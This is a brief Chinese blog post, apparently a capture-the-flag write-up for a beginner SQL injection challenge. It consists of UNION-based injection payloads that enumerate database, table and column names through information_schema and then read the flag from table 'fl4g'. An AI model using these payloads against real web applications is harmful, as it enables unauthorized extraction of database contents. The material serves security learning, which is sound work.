[第一章 web入门]SQL注入-1

payload

/index.php?id=1' and 0 union select 1,2,group_concat(fllllag) from fl4g --+

?id=-1' union select 1,2,group_concat(fllllag) from flag --+

库名

?id=-1' union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata --+

表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g' --+

字段值

?id=-1' union select 1,2,group_concat(fllllag) from fl4g --+

得到flag

posted @ 2024-07-24 17:02 8o1er9t 阅读(28) 评论(0) 收藏举报

刷新页面返回顶部